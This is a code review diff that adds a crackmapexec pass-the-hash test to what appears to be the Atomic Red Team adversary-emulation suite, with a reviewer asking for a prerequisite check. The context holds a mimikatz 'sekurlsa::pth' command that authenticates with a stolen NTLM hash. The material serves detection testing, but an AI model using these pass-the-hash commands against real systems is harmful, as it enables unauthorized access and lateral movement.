atomics/T1075/T1075.yaml

```diff
@@ -29,3 +29,35 @@ atomic_tests:
     name: command_prompt
     command: |
       mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
+
+atomic_tests:
+- name: crackmapexec Pass the Hash
+  description: |
+     command execute with crackmapexec
+
+  supported_platforms:
+    - windows
+ 
+  input_arguments:
+    user_name:
+      description: username
+      type: string
+      default: Administrator
+    domain:
+      description: domain
+      type: string
+      default: atomic.local
+    ntlm: 
+      description: command
+      type: string
+      default: cc36cf7a8514893efccd3324464tkg1a
+    command:
+      description: command to execute
+      type: string
+      default: whoami
+
+  executor:
+    name: command_prompt
+    command: |
```

Comment:
could you add a prereq_command: attribute that checks that crackmap is installed/available to execute. Please see the Invoke-AtomicRedTeam README for details on using the prereq_command attribute to check pre-requisites.